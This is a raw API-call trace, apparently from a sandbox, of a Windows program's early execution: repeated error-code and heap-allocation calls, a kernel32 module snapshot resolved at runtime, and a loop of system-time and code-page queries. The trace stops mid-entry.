[0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.947] SetLastError (dwErrCode=0x0) [0128.947] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.948] SetLastError (dwErrCode=0x0) [0128.948] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.949] SetLastError (dwErrCode=0x0) [0128.949] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.950] SetLastError (dwErrCode=0x0) [0128.950] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.951] SetLastError (dwErrCode=0x0) [0128.951] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.952] SetLastError (dwErrCode=0x0) [0128.952] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.953] GetLastError () returned 0x0 [0128.953] SetLastError (dwErrCode=0x0) [0128.954] GetLastError () returned 0x0 [0128.954] SetLastError (dwErrCode=0x0) [0128.954] GetLastError () returned 0x0 [0128.954] SetLastError (dwErrCode=0x0) [0128.954] GetLastError () returned 0x0 [0128.954] SetLastError (dwErrCode=0x0) [0128.954] GetLastError () returned 0x0 [0128.954] SetLastError (dwErrCode=0x0) [0128.954] GetLastError () returned 0x0 [0128.954] SetLastError (dwErrCode=0x0) [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x98) returned 0x1d81a00 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1f) returned 0x1d81aa0 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x36) returned 0x1d81ac8 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x37) returned 0x1d81b08 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x3c) returned 0x1d81b48 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x31) returned 0x1d81b90 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x17) returned 0x1d81bd0 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x24) returned 0x1d81bf0 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x14) returned 0x1d81c20 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0xd) returned 0x1d81c40 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x25) returned 0x1d81c58 [0128.954] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x39) returned 0x1d81c88 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x18) returned 0x1d81cd0 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x17) returned 0x1d81cf0 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0xe) returned 0x1d81d10 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x69) returned 0x1d81d28 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x3e) returned 0x1d81da0 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1b) returned 0x1d81de8 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1d) returned 0x1d81e10 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x48) returned 0x1d81e38 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x12) returned 0x1d81e88 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x18) returned 0x1d81ea8 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1b) returned 0x1d81ec8 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x24) returned 0x1d81ef0 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x29) returned 0x1d81f20 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1e) returned 0x1d81f58 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x41) returned 0x1d81f80 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x17) returned 0x1d81fd0 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0xf) returned 0x1d81ff0 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x16) returned 0x1d82008 [0128.955] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x2a) returned 0x1d82028 [0128.956] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x29) returned 0x1d82060 [0128.956] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x15) returned 0x1d82098 [0128.956] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1e) returned 0x1d820b8 [0128.956] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x2a) returned 0x1d820e0 [0128.956] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x12) returned 0x1d82118 [0128.956] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x18) returned 0x1d82138 [0128.956] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x46) returned 0x1d82158 [0128.956] HeapFree (in: hHeap=0x1d80000, dwFlags=0x0, lpMem=0x1d811f8 | out: hHeap=0x1d80000) returned 1 [0128.959] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x800) returned 0x1d821a8 [0128.960] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x80) returned 0x1d811f8 [0128.960] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0128.960] RtlSizeHeap (HeapHandle=0x1d80000, Flags=0x0, MemoryPointer=0x1d811f8) returned 0x80 [0128.961] GetLastError () returned 0x0 [0128.961] SetLastError (dwErrCode=0x0) [0128.961] GetLastError () returned 0x0 [0128.961] SetLastError (dwErrCode=0x0) [0128.961] GetLastError () returned 0x0 [0128.961] SetLastError (dwErrCode=0x0) [0128.961] GetLastError () returned 0x0 [0128.961] SetLastError (dwErrCode=0x0) [0128.961] GetLastError () returned 0x0 [0128.961] SetLastError (dwErrCode=0x0) [0128.961] GetLastError () returned 0x0 [0128.962] SetLastError (dwErrCode=0x0) [0128.962] GetLastError () returned 0x0 [0128.962] SetLastError (dwErrCode=0x0) [0128.962] GetLastError () returned 0x0 [0128.962] SetLastError (dwErrCode=0x0) [0128.962] GetLastError () returned 0x0 [0128.962] SetLastError (dwErrCode=0x0) [0128.962] GetLastError () returned 0x0 [0128.962] SetLastError (dwErrCode=0x0) [0128.962] GetLastError () returned 0x0 [0128.962] SetLastError (dwErrCode=0x0) [0128.962] GetLastError () returned 0x0 [0128.963] SetLastError (dwErrCode=0x0) [0128.963] GetLastError () returned 0x0 [0128.963] SetLastError (dwErrCode=0x0) [0128.963] GetLastError () returned 0x0 [0128.963] SetLastError (dwErrCode=0x0) [0128.963] GetLastError () returned 0x0 [0128.963] SetLastError (dwErrCode=0x0) [0128.963] GetLastError () returned 0x0 [0128.964] SetLastError (dwErrCode=0x0) [0128.964] GetLastError () returned 0x0 [0128.964] SetLastError (dwErrCode=0x0) [0128.964] GetLastError () returned 0x0 [0128.964] SetLastError (dwErrCode=0x0) [0128.964] GetLastError () returned 0x0 [0128.964] SetLastError (dwErrCode=0x0) [0128.964] GetLastError () returned 0x0 [0128.964] SetLastError (dwErrCode=0x0) [0128.965] GetLastError () returned 0x0 [0128.965] SetLastError (dwErrCode=0x0) [0128.965] GetLastError () returned 0x0 [0128.965] SetLastError (dwErrCode=0x0) [0128.965] GetLastError () returned 0x0 [0128.965] SetLastError (dwErrCode=0x0) [0128.965] GetLastError () returned 0x0 [0128.965] SetLastError (dwErrCode=0x0) [0128.965] GetLastError () returned 0x0 [0128.965] SetLastError (dwErrCode=0x0) [0128.965] GetLastError () returned 0x0 [0128.965] SetLastError (dwErrCode=0x0) [0128.966] GetLastError () returned 0x0 [0128.966] SetLastError (dwErrCode=0x0) [0128.966] GetLastError () returned 0x0 [0128.966] SetLastError (dwErrCode=0x0) [0128.966] GetLastError () returned 0x0 [0128.966] SetLastError (dwErrCode=0x0) [0128.966] GetLastError () returned 0x0 [0128.966] SetLastError (dwErrCode=0x0) [0128.966] GetLastError () returned 0x0 [0128.966] SetLastError (dwErrCode=0x0) [0128.966] GetLastError () returned 0x0 [0128.967] SetLastError (dwErrCode=0x0) [0128.967] GetLastError () returned 0x0 [0128.967] SetLastError (dwErrCode=0x0) [0128.967] GetLastError () returned 0x0 [0128.967] SetLastError (dwErrCode=0x0) [0128.967] GetLastError () returned 0x0 [0128.967] SetLastError (dwErrCode=0x0) [0128.967] GetLastError () returned 0x0 [0128.967] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0128.968] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0128.968] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0128.968] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0128.971] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0128.971] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0128.971] GetTickCount () returned 0x1154857 [0128.971] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.972] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.972] GetACP () returned 0x4e4 [0128.972] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.972] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.972] GetACP () returned 0x4e4 [0128.972] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.972] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.972] GetACP () returned 0x4e4 [0128.972] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.972] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.972] GetACP () returned 0x4e4 [0128.972] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.972] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.972] GetACP () returned 0x4e4 [0128.972] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.972] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.972] GetACP () returned 0x4e4 [0128.972] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.972] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.972] GetACP () returned 0x4e4 [0128.973] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.973] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.973] GetACP () returned 0x4e4 [0128.973] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.973] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.973] GetACP () returned 0x4e4 [0128.973] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.973] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.973] GetACP () returned 0x4e4 [0128.973] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.973] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.973] GetACP () returned 0x4e4 [0128.973] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.973] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.973] GetACP () returned 0x4e4 [0128.973] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.973] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.973] GetACP () returned 0x4e4 [0128.973] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.973] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.974] GetACP () returned 0x4e4 [0128.974] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.974] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.974] GetACP () returned 0x4e4 [0128.974] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.974] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.974] GetACP () returned 0x4e4 [0128.974] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.974] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.974] GetACP () returned 0x4e4 [0128.974] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.974] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.974] GetACP () returned 0x4e4 [0128.974] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.974] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.974] GetACP () returned 0x4e4 [0128.974] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.974] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.974] GetACP () returned 0x4e4 [0128.974] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.975] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.975] GetACP () returned 0x4e4 [0128.975] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.975] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.975] GetACP () returned 0x4e4 [0128.975] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.975] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.975] GetACP () returned 0x4e4 [0128.975] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.975] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.975] GetACP () returned 0x4e4 [0128.975] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.975] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.975] GetACP () returned 0x4e4 [0128.975] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.975] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.975] GetACP () returned 0x4e4 [0128.975] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.975] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.976] GetACP () returned 0x4e4 [0128.976] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.976] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.976] GetACP () returned 0x4e4 [0128.976] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.976] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.976] GetACP () returned 0x4e4 [0128.976] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.976] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.976] GetACP () returned 0x4e4 [0128.976] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.976] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.976] GetACP () returned 0x4e4 [0128.976] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.976] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.977] GetACP () returned 0x4e4 [0128.977] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.977] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.977] GetACP () returned 0x4e4 [0128.977] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.977] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.977] GetACP () returned 0x4e4 [0128.977] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.977] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.977] GetACP () returned 0x4e4 [0128.977] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.977] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.977] GetACP () returned 0x4e4 [0128.977] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.977] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.978] GetACP () returned 0x4e4 [0128.978] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.978] GetCPInfo (in: CodePage=0x0, 